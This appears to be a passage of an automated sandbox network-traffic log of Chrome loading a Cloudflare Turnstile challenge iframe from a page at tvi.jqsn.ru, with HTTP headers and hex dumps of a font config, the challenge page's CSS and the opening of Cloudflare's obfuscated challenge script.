                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                          X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                          Cache-Control: public, max-age=109762
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:26 GMT
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          X-CID: 2
                                                                                                                          2024-04-17 00:34:26 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449747104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:27 UTC784OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://tvi.jqsn.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:27 UTC1343INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:27 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                          cross-origin-embedder-policy: require-corp
                                                                                                                          cross-origin-opener-policy: same-origin
                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                          document-policy: js-profiling
                                                                                                                          origin-agent-cluster: ?1
                                                                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                          2024-04-17 00:34:27 UTC112INData Raw: 72 65 66 65 72 72 65 72 2d 70 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 37 35 38 35 34 35 39 35 65 37 66 35 33 66 32 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: referrer-policy: same-originServer: cloudflareCF-RAY: 875854595e7f53f2-ATLalt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:27 UTC1283INData Raw: 37 61 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c
                                                                                                                          Data Ascii: 7a00<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scal
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69
                                                                                                                          Data Ascii: ng: 0; width: 100%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, bli
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b
                                                                                                                          Data Ascii: f8f8f8; stroke-miterlimit: 10;}#success-icon { display: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both;
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f
                                                                                                                          Data Ascii: hallenge-overlay a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .ctp-checkbox-label .mark { border: 2px solid #dadada; backgro
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 61 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 65 72 6d 73 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65
                                                                                                                          Data Ascii: a:active, .theme-dark #terms a:focus { color: #949494;}.theme-dark #content { border-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 2c 20 23 63 68 61 6c
                                                                                                                          Data Ascii: ay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:visited,#challenge-error-text a:link { color: #1d1f20;}#challenge-overlay a:active, #challenge-overlay a:hover, #chal
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 73 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 74 70 2d 6c 61 62 65 6c 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                                                                          Data Ascii: s ~ .mark { border: 2px solid #c44d0e;}.ctp-checkbox-label input:focus ~ span.ctp-label { text-decoration: underline;}.ctp-checkbox-label input:checked ~ .mark { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; background-
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70
                                                                                                                          Data Ascii: margin-bottom: 0; height: 22px;}.size-compact .cb-container { margin-top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16p
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 3b 0a 20 20 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63
                                                                                                                          Data Ascii: ; width: 90px; text-align: center;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-c


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449748104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:27 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=875854595e7f53f2 HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:27 UTC335INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:27 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8758545c99a844d0-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:27 UTC1034INData Raw: 37 65 36 30 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 76 2c 66 45 2c 66 46 2c 66 4a 2c 66 4c 2c 66 4d 2c 66 4e 2c 66 4f 2c 66 50 2c 66 51 2c 66 52 2c 66 53 2c 66 54 2c 66 55 2c 66 56 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 48 2c 67 54 2c 68 36 2c 68 62 2c 68 63 2c 68 64 2c 68 70 2c 68 79 2c 68 43 2c
                                                                                                                          Data Ascii: 7e60window._cf_chl_opt.uaO=false;~function(iv,fE,fF,fJ,fL,fM,fN,fO,fP,fQ,fR,fS,fT,fU,fV,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gH,gT,h6,hb,hc,hd,hp,hy,hC,
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 30 36 37 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 45 5b 69 78 28 37 33 39 29 5d 5b 69 78 28 31 36 32 38 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 66 45 5b 69 78 28 37 33 39 29 5d 5b 69 78 28 32 37 37 34 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 69 78 28 33 30 31 35 29 5d 2c 27 72 63 56 27 3a 66 45 5b 69 78 28 37 33 39 29 5d 5b 69 78 28 31 30 38 36 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 66 45 5b 69 76 28 32 34 34 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 69 79 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 29 7b 6a 3d 28 69 79 3d 69 76 2c 69 3d 7b 7d 2c 69 5b 69 79 28 35 33 38 29 5d 3d 69 79 28 32 37 32 33 29 2c 69 5b 69 79 28 32 36 38 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c
                                                                                                                          Data Ascii: 067),'cfChlOut':fE[ix(739)][ix(1628)],'cfChlOutS':fE[ix(739)][ix(2774)],'code':e[ix(3015)],'rcV':fE[ix(739)][ix(1086)]},'*'))},g)},fE[iv(2441)]=function(f,g,h,iy,i,j,k,l,m,n,o,s,x,B){j=(iy=iv,i={},i[iy(538)]=iy(2723),i[iy(2681)]=function(C,D){return C+D},
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 69 7a 28 31 39 37 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 42 29 7b 69 42 3d 69 7a 2c 66 45 5b 69 42 28 32 34 34 31 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 69 42 28 32 32 33 36 29 29 7d 2c 31 30 29 2c 66 45 5b 69 7a 28 31 39 37 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 43 29 7b 69 43 3d 69 7a 2c 66 45 5b 69 43 28 31 33 30 38 29 5d 28 29 7d 2c 31 65 33 29 2c 66 45 5b 69 7a 28 31 38 37 36 29 5d 5b 69 7a 28 35 30 35 29 5d 28 6a 5b 69 7a 28 37 38 36 29 5d 2c 6d 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 4a 3d 7b 7d 2c 66 4a 5b 69 76 28 32 34 36 32 29 5d 3d 66 49 2c 66 45 5b 69 76 28 32 34 36 34 29 5d 3d 66 4a 2c 66 4c 3d 7b 7d 2c 66 4c 5b 69 76 28 32 30 34 35 29 5d 3d 69 76 28 32 30 35 30 29 2c 66 4c 5b 69 76 28 32 35 31 33 29 5d 3d 69 76 28 31 35 34
                                                                                                                          Data Ascii: iz(1973)](function(iB){iB=iz,fE[iB(2441)](m,undefined,iB(2236))},10),fE[iz(1973)](function(iC){iC=iz,fE[iC(1308)]()},1e3),fE[iz(1876)][iz(505)](j[iz(786)],m));return![]},fJ={},fJ[iv(2462)]=fI,fE[iv(2464)]=fJ,fL={},fL[iv(2045)]=iv(2050),fL[iv(2513)]=iv(154
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 66 4d 5b 69 76 28 31 31 32 30 29 5d 3d 69 76 28 31 36 38 35 29 2c 66 4d 5b 69 76 28 32 33 34 31 29 5d 3d 69 76 28 32 32 39 35 29 2c 66 4d 5b 69 76 28 31 33 39 32 29 5d 3d 69 76 28 32 31 34 30 29 2c 66 4d 5b 69 76 28 32 35 37 36 29 5d 3d 69 76 28 31 34 33 32 29 2c 66 4d 5b 69 76 28 32 33 32 33 29 5d 3d 69 76 28 35 35 34 29 2c 66 4d 5b 69 76 28 32 31 39 32 29 5d 3d 69 76 28 32 32 31 37 29 2c 66 4d 5b 69 76 28 35 39 32 29 5d 3d 69 76 28 33 30 34 30 29 2c 66 4d 5b 69 76 28 32 34 39 31 29 5d 3d 69 76 28 31 34 39 32 29 2c 66 4d 5b 69 76 28 32 38 31 30 29 5d 3d 69 76 28 32 33 38 34 29 2c 66 4d 5b 69 76 28 32 33 30 30 29 5d 3d 69 76 28 32 31 37 32 29 2c 66 4d 5b 69 76 28 31 38 31 39 29 5d 3d 69 76 28 31 38 34 38 29 2c 66 4d 5b 69 76 28 31 31 34 36 29 5d 3d 69 76
                                                                                                                          Data Ascii: fM[iv(1120)]=iv(1685),fM[iv(2341)]=iv(2295),fM[iv(1392)]=iv(2140),fM[iv(2576)]=iv(1432),fM[iv(2323)]=iv(554),fM[iv(2192)]=iv(2217),fM[iv(592)]=iv(3040),fM[iv(2491)]=iv(1492),fM[iv(2810)]=iv(2384),fM[iv(2300)]=iv(2172),fM[iv(1819)]=iv(1848),fM[iv(1146)]=iv
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 37 38 29 2c 66 4e 5b 69 76 28 35 30 31 29 5d 3d 69 76 28 31 31 35 38 29 2c 66 4f 3d 7b 7d 2c 66 4f 5b 69 76 28 32 30 34 35 29 5d 3d 69 76 28 39 39 34 29 2c 66 4f 5b 69 76 28 32 35 31 33 29 5d 3d 69 76 28 33 30 35 37 29 2c 66 4f 5b 69 76 28 32 33 39 30 29 5d 3d 69 76 28 32 30 35 36 29 2c 66 4f 5b 69 76 28 31 34 31 32 29 5d 3d 69 76 28 35 34 31 29 2c 66 4f 5b 69 76 28 31 37 36 39 29 5d 3d 69 76 28 32 38 36 37 29 2c 66 4f 5b 69 76 28 38 34 31 29 5d 3d 69 76 28 34 38 34 29 2c 66 4f 5b 69 76 28 31 30 30 33 29 5d 3d 69 76 28 38 35 38 29 2c 66 4f 5b 69 76 28 33 30 32 30 29 5d 3d 69 76 28 32 32 31 32 29 2c 66 4f 5b 69 76 28 31 37 33 36 29 5d 3d 69 76 28 32 37 31 31 29 2c 66 4f 5b 69 76 28 32 38 35 31 29 5d 3d 69 76 28 35 37 37 29 2c 66 4f 5b 69 76 28 31 31 30 31
                                                                                                                          Data Ascii: 78),fN[iv(501)]=iv(1158),fO={},fO[iv(2045)]=iv(994),fO[iv(2513)]=iv(3057),fO[iv(2390)]=iv(2056),fO[iv(1412)]=iv(541),fO[iv(1769)]=iv(2867),fO[iv(841)]=iv(484),fO[iv(1003)]=iv(858),fO[iv(3020)]=iv(2212),fO[iv(1736)]=iv(2711),fO[iv(2851)]=iv(577),fO[iv(1101
